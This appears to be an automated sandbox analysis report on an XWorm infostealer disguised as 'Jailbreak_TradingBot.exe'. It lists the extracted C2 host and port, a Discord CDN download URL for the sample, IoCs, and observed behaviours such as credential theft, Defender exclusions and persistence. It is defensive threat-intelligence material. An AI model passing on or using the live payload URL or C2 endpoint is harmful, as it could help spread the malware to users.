Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
104s -
max time network
107s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23/08/2024, 23:23
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1275873273644580904/1276270025006645339/Jailbreak_TradingBot.exe?ex=66ca3c15&is=66c8ea95&hm=a4fdff645b9658b689affe91012631fa21351b61107fdd456bede4a50b2c93a8&
Resource
win10v2004-20240802-en
General
-
Target
https://cdn.discordapp.com/attachments/1275873273644580904/1276270025006645339/Jailbreak_TradingBot.exe?ex=66ca3c15&is=66c8ea95&hm=a4fdff645b9658b689affe91012631fa21351b61107fdd456bede4a50b2c93a8&
Malware Config
Extracted
xworm
pressure-pl.gl.at.ply.gg:16289:16289
pressure-pl.gl.at.ply.gg:16289
-
Install_directory
%AppData%
-
install_file
XClient.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0007000000023478-92.dat family_xworm behavioral1/memory/5504-99-0x00000000005B0000-0x00000000005C8000-memory.dmp family_xworm -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5552 powershell.exe 5404 powershell.exe 5884 powershell.exe 5380 powershell.exe 600 powershell.exe 600 powershell.exe 6092 powershell.exe 4228 powershell.exe 4372 powershell.exe 4848 powershell.exe 4040 powershell.exe 1596 powershell.exe 5188 powershell.exe 4980 powershell.exe 2168 powershell.exe 3768 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 9 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Built.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation Opperhoofd.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation Jailbreak TradingBot.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation Jailbreak TradingBot.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation Jailbreak TradingBot.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation Jailbreak TradingBot.exe -
Clipboard Data 1 TTPs 6 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 5216 cmd.exe 5608 powershell.exe 3968 cmd.exe 220 powershell.exe 1684 cmd.exe 5284 powershell.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk Opperhoofd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk Opperhoofd.exe -
Executes dropped EXE 22 IoCs
pid Process 5320 Jailbreak TradingBot.exe 5260 Jailbreak TradingBot.exe 5504 Opperhoofd.exe 5588 Built.exe 5708 Built.exe 5844 Jailbreak TradingBot.exe 5936 Opperhoofd.exe 6024 Built.exe 5244 Built.exe 5884 rar.exe 5156 XClient.exe 5700 Jailbreak TradingBot.exe 5704 Opperhoofd.exe 5680 Built.exe 5304 Built.exe 1884 rar.exe 372 Jailbreak TradingBot.exe 5652 Opperhoofd.exe 5512 Built.exe 1876 Built.exe 5156 rar.exe 2260 XClient.exe -
Loads dropped DLL 64 IoCs
pid Process 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5708 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5244 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 5304 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe 1876 Built.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x000700000002348a-137.dat upx behavioral1/memory/5708-140-0x00007FFA0A4D0000-0x00007FFA0AAB9000-memory.dmp upx behavioral1/files/0x000700000002347d-143.dat upx behavioral1/memory/5708-163-0x00007FFA1FF00000-0x00007FFA1FF0F000-memory.dmp upx behavioral1/memory/5708-162-0x00007FFA0E210000-0x00007FFA0E234000-memory.dmp upx behavioral1/files/0x0007000000023484-161.dat upx behavioral1/files/0x0007000000023483-160.dat upx behavioral1/files/0x0007000000023482-159.dat upx behavioral1/files/0x0007000000023481-158.dat upx behavioral1/files/0x0007000000023480-157.dat upx behavioral1/files/0x000700000002347f-156.dat upx behavioral1/files/0x000700000002347e-155.dat upx behavioral1/files/0x000700000002347c-154.dat upx behavioral1/files/0x000700000002348f-153.dat upx behavioral1/files/0x000700000002348e-152.dat upx behavioral1/files/0x000700000002348d-151.dat upx behavioral1/files/0x0007000000023489-148.dat upx behavioral1/files/0x0007000000023487-147.dat upx behavioral1/files/0x0007000000023488-145.dat upx behavioral1/memory/5708-174-0x00007FFA0DDC0000-0x00007FFA0DDE3000-memory.dmp upx behavioral1/memory/5708-172-0x00007FFA0EC00000-0x00007FFA0EC19000-memory.dmp upx behavioral1/memory/5708-171-0x00007FFA0DEB0000-0x00007FFA0DEDD000-memory.dmp upx behavioral1/memory/5708-177-0x00007FFA0CCA0000-0x00007FFA0CE10000-memory.dmp upx behavioral1/memory/5708-183-0x00007FFA0D090000-0x00007FFA0D0BE000-memory.dmp upx behavioral1/memory/5708-182-0x00007FFA1D6A0000-0x00007FFA1D6AD000-memory.dmp upx behavioral1/memory/5708-179-0x00007FFA0E2B0000-0x00007FFA0E2C9000-memory.dmp upx behavioral1/memory/5708-188-0x00007FFA0C920000-0x00007FFA0CC95000-memory.dmp upx behavioral1/memory/5708-187-0x00007FFA09850000-0x00007FFA09908000-memory.dmp upx behavioral1/memory/5708-186-0x00007FFA0A4D0000-0x00007FFA0AAB9000-memory.dmp upx behavioral1/memory/5708-206-0x00007FFA095C0000-0x00007FFA096DC000-memory.dmp upx behavioral1/memory/5708-198-0x00007FFA1A150000-0x00007FFA1A15D000-memory.dmp upx behavioral1/memory/5708-197-0x00007FFA0DE90000-0x00007FFA0DEA4000-memory.dmp upx behavioral1/memory/5708-196-0x00007FFA0E210000-0x00007FFA0E234000-memory.dmp upx behavioral1/memory/5244-220-0x00007FFA05450000-0x00007FFA05A39000-memory.dmp upx behavioral1/memory/5708-221-0x00007FFA0DDC0000-0x00007FFA0DDE3000-memory.dmp upx behavioral1/memory/5708-224-0x00007FFA0CCA0000-0x00007FFA0CE10000-memory.dmp upx behavioral1/memory/5244-223-0x00007FFA165F0000-0x00007FFA165FF000-memory.dmp upx behavioral1/memory/5244-222-0x00007FFA0D010000-0x00007FFA0D034000-memory.dmp upx behavioral1/memory/5708-260-0x00007FFA0D090000-0x00007FFA0D0BE000-memory.dmp upx behavioral1/memory/5244-259-0x00007FFA0A4B0000-0x00007FFA0A4C9000-memory.dmp upx behavioral1/memory/5244-258-0x00007FFA08E30000-0x00007FFA08E5D000-memory.dmp upx behavioral1/memory/5244-264-0x00007FFA03270000-0x00007FFA033E0000-memory.dmp upx behavioral1/memory/5244-263-0x00007FFA08A70000-0x00007FFA08A93000-memory.dmp upx behavioral1/memory/5244-268-0x00007FFA08A40000-0x00007FFA08A6E000-memory.dmp upx behavioral1/memory/5708-267-0x00007FFA095C0000-0x00007FFA096DC000-memory.dmp upx behavioral1/memory/5244-269-0x00007FFA05450000-0x00007FFA05A39000-memory.dmp upx behavioral1/memory/5244-272-0x00007FFA0D010000-0x00007FFA0D034000-memory.dmp upx behavioral1/memory/5244-287-0x00007FFA01940000-0x00007FFA01CB5000-memory.dmp upx behavioral1/memory/5244-291-0x00007FFA0A4B0000-0x00007FFA0A4C9000-memory.dmp upx behavioral1/memory/5244-290-0x00007FFA09090000-0x00007FFA0909D000-memory.dmp upx behavioral1/memory/5244-289-0x00007FFA0C8A0000-0x00007FFA0C8B4000-memory.dmp upx behavioral1/memory/5244-288-0x00007FFA029C0000-0x00007FFA02A78000-memory.dmp upx behavioral1/memory/5244-285-0x00007FFA0DDB0000-0x00007FFA0DDBD000-memory.dmp upx behavioral1/memory/5244-284-0x00007FFA08D50000-0x00007FFA08D69000-memory.dmp upx behavioral1/memory/5244-283-0x00007FFA03270000-0x00007FFA033E0000-memory.dmp upx behavioral1/memory/5244-282-0x00007FFA08A70000-0x00007FFA08A93000-memory.dmp upx behavioral1/memory/5244-280-0x00007FFA08E30000-0x00007FFA08E5D000-memory.dmp upx behavioral1/memory/5244-279-0x00007FFA165F0000-0x00007FFA165FF000-memory.dmp upx behavioral1/memory/5244-277-0x00007FFA05450000-0x00007FFA05A39000-memory.dmp upx behavioral1/memory/5244-286-0x00007FFA08A40000-0x00007FFA08A6E000-memory.dmp upx behavioral1/memory/5244-278-0x00007FFA0D010000-0x00007FFA0D034000-memory.dmp upx behavioral1/memory/5244-274-0x00007FFA09090000-0x00007FFA0909D000-memory.dmp upx behavioral1/memory/5244-273-0x00007FFA0C8A0000-0x00007FFA0C8B4000-memory.dmp upx behavioral1/memory/5244-271-0x00007FFA029C0000-0x00007FFA02A78000-memory.dmp upx -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" Opperhoofd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 103 discord.com 104 discord.com 71 discord.com 72 discord.com 85 discord.com 86 discord.com -
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 49 ip-api.com 68 ip-api.com 83 ip-api.com 101 ip-api.com -
Enumerates processes with tasklist 1 TTPs 15 IoCs
pid Process 5588 tasklist.exe 4320 tasklist.exe 5792 tasklist.exe 5996 tasklist.exe 2720 tasklist.exe 5324 tasklist.exe 6120 tasklist.exe 5488 tasklist.exe 1472 tasklist.exe 6024 tasklist.exe 5852 tasklist.exe 2660 tasklist.exe 5652 tasklist.exe 5044 tasklist.exe 768 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 3 IoCs
pid Process 5252 cmd.exe 3664 cmd.exe 3632 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3936 cmd.exe 3892 PING.EXE 5288 cmd.exe 3860 PING.EXE 5264 cmd.exe 2780 PING.EXE -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 5556 cmd.exe 6068 netsh.exe 3312 cmd.exe 5700 netsh.exe 1288 cmd.exe 3992 netsh.exe -
Detects videocard installed 1 TTPs 9 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 3860 WMIC.exe 1748 WMIC.exe 5596 WMIC.exe 4828 WMIC.exe 1700 WMIC.exe 5736 WMIC.exe 3688 WMIC.exe 5608 WMIC.exe 5676 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 3 IoCs
Runs systeminfo.exe.
pid Process 6140 systeminfo.exe 5372 systeminfo.exe 5872 systeminfo.exe -
Kills process with taskkill 20 IoCs
pid Process 6136 taskkill.exe 5228 taskkill.exe 5768 taskkill.exe 5764 taskkill.exe 5820 taskkill.exe 5704 taskkill.exe 5556 taskkill.exe 5560 taskkill.exe 5244 taskkill.exe 5208 taskkill.exe 1344 taskkill.exe 6120 taskkill.exe 6040 taskkill.exe 5456 taskkill.exe 5668 taskkill.exe 5448 taskkill.exe 5872 taskkill.exe 3276 taskkill.exe 5160 taskkill.exe 6108 taskkill.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 346191.crdownload:SmartScreen msedge.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 3860 PING.EXE 2780 PING.EXE 3892 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5604 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 5504 Opperhoofd.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4640 msedge.exe 4640 msedge.exe 3604 msedge.exe 3604 msedge.exe 2080 identity_helper.exe 2080 identity_helper.exe 5152 msedge.exe 5152 msedge.exe 600 powershell.exe 600 powershell.exe 600 powershell.exe 1596 powershell.exe 1596 powershell.exe 1596 powershell.exe 6092 powershell.exe 6092 powershell.exe 6092 powershell.exe 5552 powershell.exe 5552 powershell.exe 5552 powershell.exe 5404 powershell.exe 5404 powershell.exe 5404 powershell.exe 5608 powershell.exe 5608 powershell.exe 5608 powershell.exe 5884 powershell.exe 5884 powershell.exe 5884 powershell.exe 5188 powershell.exe 5188 powershell.exe 5188 powershell.exe 5580 powershell.exe 5580 powershell.exe 5580 powershell.exe 4228 powershell.exe 4228 powershell.exe 4228 powershell.exe 2592 powershell.exe 2592 powershell.exe 2592 powershell.exe 4372 powershell.exe 4372 powershell.exe 5380 powershell.exe 5380 powershell.exe 5380 powershell.exe 4372 powershell.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 4980 powershell.exe 4980 powershell.exe 4980 powershell.exe 5704 powershell.exe 5704 powershell.exe 5704 powershell.exe 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 4780 powershell.exe 4780 powershell.exe 4780 powershell.exe 600 powershell.exe 600 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5504 Opperhoofd.exe Token: SeDebugPrivilege 5936 Opperhoofd.exe Token: SeDebugPrivilege 600 powershell.exe Token: SeIncreaseQuotaPrivilege 5408 WMIC.exe Token: SeSecurityPrivilege 5408 WMIC.exe Token: SeTakeOwnershipPrivilege 5408 WMIC.exe Token: SeLoadDriverPrivilege 5408 WMIC.exe Token: SeSystemProfilePrivilege 5408 WMIC.exe Token: SeSystemtimePrivilege 5408 WMIC.exe Token: SeProfSingleProcessPrivilege 5408 WMIC.exe Token: SeIncBasePriorityPrivilege 5408 WMIC.exe Token: SeCreatePagefilePrivilege 5408 WMIC.exe Token: SeBackupPrivilege 5408 WMIC.exe Token: SeRestorePrivilege 5408 WMIC.exe Token: SeShutdownPrivilege 5408 WMIC.exe Token: SeDebugPrivilege 5408 WMIC.exe Token: SeSystemEnvironmentPrivilege 5408 WMIC.exe Token: SeRemoteShutdownPrivilege 5408 WMIC.exe Token: SeUndockPrivilege 5408 WMIC.exe Token: SeManageVolumePrivilege 5408 WMIC.exe Token: 33 5408 WMIC.exe Token: 34 5408 WMIC.exe Token: 35 5408 WMIC.exe Token: 36 5408 WMIC.exe Token: SeDebugPrivilege 1596 powershell.exe Token: SeDebugPrivilege 5652 tasklist.exe Token: SeIncreaseQuotaPrivilege 5408 WMIC.exe Token: SeSecurityPrivilege 5408 WMIC.exe Token: SeTakeOwnershipPrivilege 5408 WMIC.exe Token: SeLoadDriverPrivilege 5408 WMIC.exe Token: SeSystemProfilePrivilege 5408 WMIC.exe Token: SeSystemtimePrivilege 5408 WMIC.exe Token: SeProfSingleProcessPrivilege 5408 WMIC.exe Token: SeIncBasePriorityPrivilege 5408 WMIC.exe Token: SeCreatePagefilePrivilege 5408 WMIC.exe Token: SeBackupPrivilege 5408 WMIC.exe Token: SeRestorePrivilege 5408 WMIC.exe Token: SeShutdownPrivilege 5408 WMIC.exe Token: SeDebugPrivilege 5408 WMIC.exe Token: SeSystemEnvironmentPrivilege 5408 WMIC.exe Token: SeRemoteShutdownPrivilege 5408 WMIC.exe Token: SeUndockPrivilege 5408 WMIC.exe Token: SeManageVolumePrivilege 5408 WMIC.exe Token: 33 5408 WMIC.exe Token: 34 5408 WMIC.exe Token: 35 5408 WMIC.exe Token: 36 5408 WMIC.exe Token: SeDebugPrivilege 6092 powershell.exe Token: SeIncreaseQuotaPrivilege 5596 WMIC.exe Token: SeSecurityPrivilege 5596 WMIC.exe Token: SeTakeOwnershipPrivilege 5596 WMIC.exe Token: SeLoadDriverPrivilege 5596 WMIC.exe Token: SeSystemProfilePrivilege 5596 WMIC.exe Token: SeSystemtimePrivilege 5596 WMIC.exe Token: SeProfSingleProcessPrivilege 5596 WMIC.exe Token: SeIncBasePriorityPrivilege 5596 WMIC.exe Token: SeCreatePagefilePrivilege 5596 WMIC.exe Token: SeBackupPrivilege 5596 WMIC.exe Token: SeRestorePrivilege 5596 WMIC.exe Token: SeShutdownPrivilege 5596 WMIC.exe Token: SeDebugPrivilege 5596 WMIC.exe Token: SeSystemEnvironmentPrivilege 5596 WMIC.exe Token: SeRemoteShutdownPrivilege 5596 WMIC.exe Token: SeUndockPrivilege 5596 WMIC.exe -
Suspicious use of FindShellTrayWindow 36 IoCs
pid Process 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe 3604 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3604 wrote to memory of 416 3604 msedge.exe 84 PID 3604 wrote to memory of 416 3604 msedge.exe 84 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4388 3604 msedge.exe 85 PID 3604 wrote to memory of 4640 3604 msedge.exe 86 PID 3604 wrote to memory of 4640 3604 msedge.exe 86 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 PID 3604 wrote to memory of 1684 3604 msedge.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 9 IoCs
pid Process 1932 attrib.exe 768 attrib.exe 5936 attrib.exe 5668 attrib.exe 5500 attrib.exe 1536 attrib.exe 2716 attrib.exe 5948 attrib.exe 5296 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1275873273644580904/1276270025006645339/Jailbreak_TradingBot.exe?ex=66ca3c15&is=66c8ea95&hm=a4fdff645b9658b689affe91012631fa21351b61107fdd456bede4a50b2c93a8&1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa1f8346f8,0x7ffa1f834708,0x7ffa1f8347182⤵PID:416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:22⤵PID:4388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2860 /prefetch:82⤵PID:1684
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:12⤵PID:4936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,13172239359815802454,5324712956071313518,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:12⤵PID:2460
-
-
